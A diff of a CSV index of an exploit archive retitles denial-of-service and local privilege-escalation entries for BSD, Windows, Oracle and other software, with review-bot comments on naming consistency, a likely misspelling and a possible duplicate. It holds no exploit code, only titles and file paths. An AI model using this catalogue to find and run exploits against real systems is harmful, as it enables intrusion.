@@ -2291,7 +2291,7 @@ id,file,description,date,author,platform,type,port 19414,platforms/windows/dos/19414.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (2)",1999-07-03,klepto,windows,dos,0 19415,platforms/windows/dos/19415.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (3)",1999-04-06,"Rob Mosher",windows,dos,0 19416,platforms/windows/dos/19416.c,"Netscape Enterprise Server 3.6 - SSL Buffer Overflow Denial of Service",1999-07-06,"Arne Vidstrom",windows,dos,0 -19423,platforms/bsd/dos/19423.c,"Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",bsd,dos,0 +19423,platforms/bsd/dos/19423.c,"BSD/Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",bsd,dos,0 19436,platforms/hardware/dos/19436.txt,"Check Point Software Firewall-1 3.0/1 4.0 - Table Saturation Denial of Service",1999-07-29,"Lance Spitzner",hardware,dos,0 19441,platforms/hardware/dos/19441.c,"Network Associates Gauntlet Firewall 5.0 - Denial of Service",1999-07-30,"Mike Frantzen",hardware,dos,0 19445,platforms/windows/dos/19445.txt,"Microsoft FrontPage Personal Web Server 1.0 - PWS Denial of Service",1999-08-08,Narr0w,windows,dos,0 
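Review bot: the renamed 19423 title `BSD/Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4)` is still ambiguous: read left to right it makes BSD a variant of Linux kernel 2.3, while the platform column says `bsd` and the parenthesised list names only BSD systems. If the entry covers both families, list them the way other multi-platform titles in this patch do (`BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4 / Linux Kernel 2.3 - Shared Memory Denial of Service`); if Linux is not affected, drop it from the title rather than prefixing it.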
@@ -2306,7 +2306,7 @@ id,file,description,date,author,platform,type,port 19483,platforms/windows/dos/19483.txt,"IrfanView JLS Formats PlugIn - Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0 19488,platforms/bsd/dos/19488.c,"FreeBSD 5.0 / NetBSD 1.4.2 / OpenBSD 2.7 - 'setsockopt()' Denial of Service",1999-09-05,"L. Sassaman",bsd,dos,0 19489,platforms/windows/dos/19489.txt,"Microsoft Windows NT 4.0 - DCOM Server",1999-09-08,Mnemonix,windows,dos,0 -19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service",1999-09-22,"Charles M. Hannum",freebsd,dos,0 +19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 - 'vfs_cache' Denial of Service",1999-09-22,"Charles M. Hannum",freebsd,dos,0 19507,platforms/solaris/dos/19507.txt,"Solaris 7.0 - Recursive mutex_enter Remote Panic (Denial of Service)",1999-09-23,"David Brumley",solaris,dos,0 19513,platforms/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - Denial of Service",1999-09-27,"Bjorn Stickler",hardware,dos,0 19531,platforms/hardware/dos/19531.txt,"Cisco IOS 12.0.2 - Syslog Crash",1999-01-11,"Olaf Selke",hardware,dos,0 
@@ -2438,7 +2438,7 @@ id,file,description,date,author,platform,type,port 20219,platforms/windows/dos/20219.txt,"WebTV for Windows 98/ME - Denial of Service",2000-09-12,Smashstack,windows,dos,0 20221,platforms/windows/dos/20221.pl,"Jack De Winter WinSMTP 1.6 f/2.0 - Buffer Overflow",2000-09-11,"Guido Bakker",windows,dos,0 20225,platforms/windows/dos/20225.pl,"Alt-N MDaemon 3.1.1 - Denial of Service",1999-12-01,"Ussr Labs",windows,dos,0 -20226,platforms/freebsd/dos/20226.c,"FreeBSD Kernel - SCTP Remote NULL Ptr Dereference Denial of Service",2012-08-03,"Shaun Colley",freebsd,dos,0 +20226,platforms/freebsd/dos/20226.c,"FreeBSD - SCTP Remote NULL Ptr Dereference Denial of Service",2012-08-03,"Shaun Colley",freebsd,dos,0 20228,platforms/windows/dos/20228.pl,"TYPSoft FTP Server 0.7.x - FTP Server Remote Denial of Service",1999-06-08,dethy,windows,dos,0 20229,platforms/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin - Denial of Service",2000-09-15,"Rude Yak",multiple,dos,0 20233,platforms/windows/dos/20233.txt,"NetcPlus BrowseGate 2.80 - Denial of Service",2000-09-21,"Delphis Consulting",windows,dos,0 
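Review bot: dropping `Kernel` from the 20226 title removes the one word telling a reader this is a NULL pointer dereference in the kernel SCTP stack (a remote panic) rather than a crash of a userland SCTP service; unlike 'mountnfs()' elsewhere in this patch, `SCTP` on its own does not imply kernel code. Keep the qualifier, quote the component like the other renames, and spell it `Null Pointer` as the 11705 rename in this patch does rather than `NULL Ptr`: `FreeBSD - 'SCTP' Remote Kernel Null Pointer Dereference Denial of Service`.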
@@ -3012,7 +3012,7 @@ id,file,description,date,author,platform,type,port 23274,platforms/linux/dos/23274.pl,"Coreutils 4.5.x - LS Width Argument Integer Overflow",2003-10-22,druid,linux,dos,0 23276,platforms/multiple/dos/23276.java,"Sun Java Virtual Machine 1.x - Slash Path Security Model Circumvention",2003-10-22,"Last Stage of Delirium",multiple,dos,0 23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 - Information Disclosure/Denial of Service",2003-11-19,3APA3A,windows,dos,0 -23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl - Local Denial of Service",2003-11-19,anonymous,openbsd,dos,0 +23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 - 'sysctl' Local Denial of Service",2003-11-19,anonymous,openbsd,dos,0 23279,platforms/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 - Crash (PoC)",2012-12-10,"Jean Pascal Pereira",windows,dos,0 23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 - Crash (PoC)",2012-12-10,"Jean Pascal Pereira",windows,dos,0 23314,platforms/multiple/dos/23314.c,"Serious Sam Engine 1.0.5 - Remote Denial of Service",2003-10-30,"Luigi Auriemma",multiple,dos,0 
@@ -3220,7 +3220,7 @@ id,file,description,date,author,platform,type,port 24426,platforms/windows/dos/24426.html,"Opera Web Browser 7.23 - Empty Embedded Object JavaScript Denial of Service",2004-09-01,Stevo,windows,dos,0 24437,platforms/windows/dos/24437.py,"Apple Quick Time Player (Windows) 7.7.3 - Out of Bound Read",2013-01-29,"Debasish Mandal",windows,dos,0 24448,platforms/windows/dos/24448.svg,"Opera SVG - Use-After-Free",2013-02-05,Cons0ul,windows,dos,0 -24450,platforms/freebsd/dos/24450.txt,"FreeBSD 9.1 ftpd - Remote Denial of Service",2013-02-05,"Maksymilian Arciemowicz",freebsd,dos,0 +24450,platforms/freebsd/dos/24450.txt,"FreeBSD 9.1 - 'ftpd' Remote Denial of Service",2013-02-05,"Maksymilian Arciemowicz",freebsd,dos,0 24463,platforms/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 - Buffer Overflow",2013-02-07,"Chris Gabriel",windows,dos,0 24468,platforms/windows/dos/24468.pl,"KMPlayer - Denial of Service",2013-02-10,Jigsaw,windows,dos,0 24511,platforms/windows/dos/24511.txt,"SAP NetWeaver Message Server - Multiple Vulnerabilities",2013-02-17,"Core Security",windows,dos,0 
@@ -3666,7 +3666,7 @@ id,file,description,date,author,platform,type,port 30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 - '.ico' Buffer Overflow",2013-12-11,"Core Security",windows,dos,0 28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 - Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos,0 28812,platforms/freebsd/dos/28812.c,"FreeBSD 5.5/6.x - Scheduler Policy Local Denial of Service",2006-10-13,"Diane Bruce",freebsd,dos,0 -28813,platforms/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 Ftrucante - Local Denial of Service",2006-10-13,"Kirk Russell",freebsd,dos,0 +28813,platforms/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 - Ftrucante Local Denial of Service",2006-10-13,"Kirk Russell",freebsd,dos,0 28816,platforms/linux/dos/28816.txt,"KMail 1.x - HTML Element Handling Denial of Service",2006-10-16,nnp,linux,dos,0 28822,platforms/windows/dos/28822.txt,"Microsoft Class Package Export Tool 5.0.2752 - 'Clspack.exe' Local Buffer Overflow",2006-10-16,mmd_000,windows,dos,0 28834,platforms/windows/dos/28834.txt,"Microsoft Windows XP - 'cmd.exe' Buffer Overflow",2006-10-20,"Alberto Cortes",windows,dos,0 
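Review bot: `Ftrucante` on the 28813 line is carried over unchanged and unquoted; it reads like a misspelling of `ftruncate`, which would also explain why the rename did not quote it as a component. Check `platforms/freebsd/dos/28813.c` before this lands and, if the exploit targets ftruncate, correct the spelling and quote it (`FreeBSD 6.0/6.1 - 'ftruncate' Local Denial of Service`) so the entry matches the other renames in this patch and is findable by search.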
@@ -3691,7 +3691,7 @@ id,file,description,date,author,platform,type,port 29164,platforms/windows/dos/29164.cpp,"FortKnox Personal Firewall 9.0.305.0/10.0.305.0 - Kernel Driver 'fortknoxfw.sys' Memory Corruption",2013-10-24,"Arash Allebrahim",windows,dos,0 29170,platforms/windows/dos/29170.c,"Nvidia NView 3.5 - 'Keystone.exe' Local Denial of Service",2006-11-23,Hessam-x,windows,dos,0 29172,platforms/windows/dos/29172.txt,"Microsoft Office 97 - HTMLMARQ.OCX Library Denial of Service",2006-11-22,"Michal Bucko",windows,dos,0 -29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0 +29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 - 'FTPd / Tnftpd' Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0 29229,platforms/windows/dos/29229.txt,"Microsoft Internet Explorer 6 - Frame Src Denial of Service",2006-12-05,"Juan Pablo Lopez",windows,dos,0 29236,platforms/windows/dos/29236.html,"Microsoft Internet Explorer 7 - CSS Width Element Denial of Service",2006-12-06,xiam.core,windows,dos,0 29285,platforms/windows/dos/29285.txt,"Microsoft Windows Media Player 6.4/10.0 - MID Malformed Header Chunk Denial of Service",2006-12-15,shinnai,windows,dos,0 
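Review bot: 29204 (`NetBSD 3.1 - 'FTPd / Tnftpd' Port Remote Buffer Overflow`, author `kcope`, 2006-12-01) and 2874 in the hunk at `@@ -422` (`NetBSD - 'FTPd / Tnftpd' Remote Stack Overflow (PoC)`, author `kingcope`, 2006-11-30) describe the same target, one day apart, under two spellings of the same alias. Before retitling both, compare `platforms/bsd/dos/2874.pl` with `platforms/netbsd_x86/dos/29204.pl`; if they are the same PoC one should be flagged as a duplicate rather than renamed, and either way the author field should use a single spelling.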
@@ -3982,7 +3982,7 @@ id,file,description,date,author,platform,type,port 31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash (PoC)",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80 31542,platforms/multiple/dos/31542.txt,"IBM solidDB 6.0.10 - Format String / Denial of Service",2008-03-26,"Luigi Auriemma",multiple,dos,0 31984,platforms/linux/dos/31984.txt,"Mozilla Firefox 3.0 - '.JPEG' File Denial of Service",2008-06-27,"Beenu Arora",linux,dos,0 -31550,platforms/bsd/dos/31550.c,"Multiple BSD Distributions - 'strfmon()' Integer Overflow",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0 +31550,platforms/bsd/dos/31550.c,"BSD (Multiple Distributions) - 'strfmon()' Integer Overflow",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0 31552,platforms/linux/dos/31552.txt,"Wireshark 0.99.8 - X.509sat Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 31553,platforms/linux/dos/31553.txt,"Wireshark 0.99.8 - LDAP Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 31554,platforms/linux/dos/31554.txt,"Wireshark 0.99.8 - SCCP Dissector Decode As Feature Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 
@@ -4172,7 +4172,7 @@ id,file,description,date,author,platform,type,port 33043,platforms/linux/dos/33043.txt,"Linux Kernel 2.6.x (Sparc64) - '/proc/iomem' Local Denial of Service",2009-05-03,"Mikulas Patocka",linux,dos,0 33049,platforms/linux/dos/33049.txt,"LibTIFF 3.8.2 - 'LZWDecodeCompat()' Remote Buffer Underflow",2009-05-21,wololo,linux,dos,0 33056,platforms/windows/dos/33056.pl,"Symantec Endpoint Protection Manager 12.1.x - Overflow (SEH) (PoC)",2014-04-27,st3n,windows,dos,0 -33058,platforms/multiple/dos/33058.txt,"Multiple BSD Distributions - 'gdtoa/misc.c' Memory Corruption",2009-05-26,"Maksymilian Arciemowicz",multiple,dos,0 +33058,platforms/multiple/dos/33058.txt,"BSD (Multiple Distributions) - 'gdtoa/misc.c' Memory Corruption",2009-05-26,"Maksymilian Arciemowicz",multiple,dos,0 33059,platforms/windows/dos/33059.smpl,"BaoFeng Storm 3.9.62 - '.Playlist' File Buffer Overflow",2009-05-28,Jambalaya,windows,dos,0 33062,platforms/windows/dos/33062.txt,"Apple Safari 4 - 'reload()' Denial of Service",2009-06-02,SkyOut,windows,dos,0 33073,platforms/linux/dos/33073.c,"NTP ntpd monlist Query Reflection - Denial of Service",2014-04-28,"Danilo PC",linux,dos,123 
@@ -4225,7 +4225,7 @@ id,file,description,date,author,platform,type,port 33312,platforms/linux/dos/33312.txt,"Mozilla Firefox 3.5.3 - Floating Point Conversion Heap Overflow",2009-10-27,"Alin Rad Pop",linux,dos,0 33314,platforms/linux/dos/33314.html,"Mozilla Firefox 3.0.14 - Remote Memory Corruption",2009-10-27,"Carsten Book",linux,dos,0 33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0 -33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions - 'printf(3)' Memory Corruption",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0 +33319,platforms/bsd/dos/33319.txt,"BSD (Multiple Distributions) - 'printf(3)' Memory Corruption",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0 33591,platforms/linux/dos/33591.sh,"lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Service",2010-02-02,"Li Ming",linux,dos,0 33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service",2010-02-02,"Marcelo Tosatti",linux,dos,0 33328,platforms/hardware/dos/33328.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Denial of Service Vulnerabilities",2014-05-12,"Luigi Vezzoso",hardware,dos,0 
@@ -4475,7 +4475,7 @@ id,file,description,date,author,platform,type,port 35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - Null Pointer Dereference Denial of Service",2011-06-28,"Luigi Auriemma",windows,dos,0 35913,platforms/android/dos/35913.txt,"Android WiFi-Direct - Denial of Service",2015-01-26,"Core Security",android,dos,0 35935,platforms/windows/dos/35935.py,"UniPDF 1.1 - Crash (PoC) (SEH)",2015-01-29,bonze,windows,dos,0 -35938,platforms/freebsd/dos/35938.txt,"FreeBSD Kernel - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos,0 +35938,platforms/freebsd/dos/35938.txt,"FreeBSD - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos,0 35939,platforms/hardware/dos/35939.txt,"Alice Modem 1111 - 'rulename' Cross-Site Scripting / Denial of Service",2011-07-12,"Moritz Naumann",hardware,dos,0 35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 - glibc gethostbyname Denial of Service",2015-01-29,1n3,linux,dos,0 35957,platforms/linux/dos/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (PoC)",2009-10-19,"R. Dominguez Veg",linux,dos,0 
@@ -5065,7 +5065,7 @@ id,file,description,date,author,platform,type,port 39561,platforms/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39562,platforms/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0 39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0 -39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 Kernel (x64) - 'amd64_set_ldt' Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0 +39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 (x64) - 'amd64_set_ldt' Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0 39600,platforms/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",windows,dos,0 39601,platforms/windows/dos/39601.txt,"Comodo - PackMan Unpacker Insufficient Parameter Validation",2016-03-23,"Google Security Research",windows,dos,0 39602,platforms/windows/dos/39602.txt,"Comodo - LZMA Decoder Heap Overflow via Insufficient Parameter Checks",2016-03-23,"Google Security Research",windows,dos,0 
@@ -5720,6 +5720,7 @@ id,file,description,date,author,platform,type,port 43010,platforms/linux/dos/43010.c,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,linux,dos,0 43014,platforms/linux/dos/43014.txt,"Xen - Unbounded Recursion in Pagetable De-typing",2017-10-18,"Google Security Research",linux,dos,0 43020,platforms/multiple/dos/43020.txt,"Mozilla Firefox < 55 - Denial of Service",2017-10-20,"Amit Sangra",multiple,dos,0 +43026,platforms/windows/dos/43026.py,"ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service",2017-10-21,"Berk Cem Göksel",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 
@@ -5801,8 +5802,8 @@ id,file,description,date,author,platform,type,port 273,platforms/linux/local/273.c,"SquirrelMail - 'chpasswd' Buffer Overflow",2004-04-20,x314,linux,local,0 281,platforms/tru64/local/281.c,"Tru64 UNIX 4.0g - '/usr/bin/at' Privilege Escalation",2001-03-02,"Cody Tubbs",tru64,local,0 285,platforms/linux/local/285.c,"Slackware 7.1 - '/usr/bin/mail' Local Exploit",2001-03-03,kengz,linux,local,0 -286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 - ports package xklock Privilege Escalation",2001-03-03,dethy,bsd,local,0 -287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package elvrec Privilege Escalation",2001-03-03,dethy,bsd,local,0 +286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 - Ports Package 'xklock' Privilege Escalation",2001-03-03,dethy,bsd,local,0 +287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package 'elvrec' Privilege Escalation",2001-03-03,dethy,bsd,local,0 288,platforms/multiple/local/288.c,"Progress Database Server 8.3b - 'prodb' Privilege Escalation",2001-03-04,"the itch",multiple,local,0 290,platforms/linux/local/290.sh,"GLIBC 2.1.3 - LD_PRELOAD Local Exploit",2001-03-04,Shadow,linux,local,0 302,platforms/unix/local/302.c,"UNIX 7th Edition /bin/mkdir - Local Buffer Overflow",2004-06-25,anonymous,unix,local,0 
@@ -5839,7 +5840,7 @@ id,file,description,date,author,platform,type,port 393,platforms/linux/local/393.c,"LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow",2004-08-13,anonymous,linux,local,0 394,platforms/linux/local/394.c,"ProFTPd - 'ftpdctl pr_ctrls_connect' Exploit",2004-08-13,pi3,linux,local,0 395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Exploit",2004-08-14,mandragore,windows,local,0 -396,platforms/bsd/local/396.c,"OpenBSD ftp - Exploit",2002-01-01,Teso,bsd,local,0 +396,platforms/bsd/local/396.c,"OpenBSD - 'ftp' Exploit",2002-01-01,Teso,bsd,local,0 401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0 403,platforms/windows/local/403.c,"IPD (Integrity Protection Driver) - Local Exploit",2004-08-18,anonymous,windows,local,0 411,platforms/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Exploit",2001-01-01,sd,linux,local,0 
@@ -5877,7 +5878,7 @@ id,file,description,date,author,platform,type,port 714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",solaris,local,0 715,platforms/solaris/local/715.c,"Solaris 8/9 passwd - 'circ()' Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0 718,platforms/linux/local/718.c,"Linux Kernel < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation",2004-12-24,"Marco Ivaldi",linux,local,0 -739,platforms/bsd/local/739.c,"FreeBSD /usr/bin/top - Format String",2001-07-23,truefinder,bsd,local,0 +739,platforms/bsd/local/739.c,"FreeBSD - '/usr/bin/top' Format String",2001-07-23,truefinder,bsd,local,0 741,platforms/linux/local/741.pl,"HTGET 0.9.x - Privilege Escalation",2005-01-05,nekd0,linux,local,0 744,platforms/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)",2005-01-07,"Paul Starzetz",linux,local,0 749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local Exploit",2005-01-11,"Cesar Cerrudo",windows,local,0 
@@ -5987,7 +5988,7 @@ id,file,description,date,author,platform,type,port 1299,platforms/linux/local/1299.sh,"Linux chfn (SuSE 9.3/10) - Privilege Escalation",2005-11-08,Hunger,linux,local,0 1300,platforms/linux/local/1300.sh,"Operator Shell (osh) 1.7-14 - Privilege Escalation",2005-11-09,"Charles Stevenson",linux,local,0 1310,platforms/linux/local/1310.txt,"Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation",2005-11-09,"Breno Silva Pinto",linux,local,0 -1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - master.passwd Disclosure",2005-11-09,kingcope,bsd,local,0 +1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - 'master.passwd' Disclosure",2005-11-09,kingcope,bsd,local,0 1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 - VCSI18N_LANG Local Overflow",2005-11-12,"Kevin Finisterre",linux,local,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - 'phgrafx' Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0 1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Exploit",2005-12-07,c0ntex,solaris,local,0 
@@ -6155,7 +6156,7 @@ id,file,description,date,author,platform,type,port 3571,platforms/linux/local/3571.php,"PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Exploit",2007-03-25,"Stefan Esser",linux,local,0 3572,platforms/linux/local/3572.php,"PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite",2007-03-25,"Stefan Esser",linux,local,0 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL PHPDOC - Local Buffer Overflow",2007-03-25,rgod,windows,local,0 -3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 (eject) - Buffer Overflow Privilege Escalation",2007-03-26,harry,bsd,local,0 +3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 'Eject' - Buffer Overflow Privilege Escalation",2007-03-26,harry,bsd,local,0 3587,platforms/linux/local/3587.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)",2007-03-27,"Robert Swiecki",linux,local,0 3593,platforms/windows/local/3593.c,"Corel WordPerfect X3 13.0.0.565 - '.prs' Local Buffer Overflow",2007-03-28,"Jonathan So",windows,local,0 3595,platforms/linux/local/3595.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)",2007-03-28,"Robert Swiecki",linux,local,0 
@@ -6232,7 +6233,7 @@ id,file,description,date,author,platform,type,port 4517,platforms/windows/local/4517.php,"PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass",2007-10-11,shinnai,windows,local,0 4531,platforms/windows/local/4531.py,"jetAudio 7.x - '.m3u' Local Overwrite (SEH)",2007-10-14,h07,windows,local,0 4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass",2007-10-22,shinnai,windows,local,0 -4564,platforms/multiple/local/4564.txt,"Oracle 10g - CTX_DOC.MARKUP SQL Injection",2007-10-23,sh2kerr,multiple,local,0 +4564,platforms/multiple/local/4564.txt,"Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection",2007-10-23,sh2kerr,multiple,local,0 4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (1)",2007-10-27,bunker,multiple,local,0 4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (2)",2007-10-27,bunker,multiple,local,0 4572,platforms/multiple/local/4572.txt,"Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0 
@@ -6330,7 +6331,7 @@ id,file,description,date,author,platform,type,port 7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,windows,local,0 7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0 7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,windows,local,0 -7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 protosw Kernel - Privilege Escalation",2008-12-28,"Don Bailey",freebsd,local,0 +7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - 'protosw' Privilege Escalation",2008-12-28,"Don Bailey",freebsd,local,0 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)",2008-12-28,Cnaph,windows,local,0 7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - 'ProxyLogin' Local Stack Overflow",2008-12-29,His0k4,windows,local,0 7618,platforms/linux/local/7618.c,"Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure",2008-12-29,"Jon Oberheide",linux,local,0 
@@ -6374,7 +6375,7 @@ id,file,description,date,author,platform,type,port 7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Remote Overflow",2009-02-04,LiquidWorm,windows,local,0 7994,platforms/windows/local/7994.c,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow",2009-02-05,SimO-s0fT,windows,local,0 8010,platforms/windows/local/8010.pl,"feedDemon 2.7 - OPML Outline Tag Buffer Overflow",2009-02-09,cenjan,windows,local,0 -8055,platforms/freebsd/local/8055.txt,"FreeBSD 7.0-RELEASE Telnet Daemon - Privilege Escalation",2009-02-16,kingcope,freebsd,local,0 +8055,platforms/freebsd/local/8055.txt,"FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation",2009-02-16,kingcope,freebsd,local,0 8067,platforms/multiple/local/8067.txt,"Enomaly ECP / Enomalism < 2.2.1 - Multiple Local Vulnerabilities",2009-02-16,"Sam Johnston",multiple,local,0 8074,platforms/multiple/local/8074.rb,"Oracle 10g - MDSYS.SDO_TOPO_DROP_FTBL SQL Injection (Metasploit)",2009-02-18,sh2kerr,multiple,local,0 8108,platforms/osx/local/8108.c,"Apple Mac OSX xnu 1228.x - Local Kernel Memory Disclosure",2009-02-25,mu-b,osx,local,0 
@@ -6406,7 +6407,7 @@ id,file,description,date,author,platform,type,port 8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0 8250,platforms/windows/local/8250.txt,"CloneCD/DVD 'ElbyCDIO.sys' < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0 8251,platforms/windows/local/8251.py,"BS.Player 2.34 - '.bsl' Universal Overwrite (SEH)",2009-03-20,His0k4,windows,local,0 -8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - 'ktimer' Kernel Privilege Escalation",2009-03-23,mu-b,freebsd,local,0 +8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - 'ktimer' Privilege Escalation",2009-03-23,mu-b,freebsd,local,0 8266,platforms/osx/local/8266.txt,"Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation",2009-03-23,mu-b,osx,local,0 8267,platforms/windows/local/8267.py,"Zinf Audio Player 2.2.1 - '.pls' Universal Overwrite 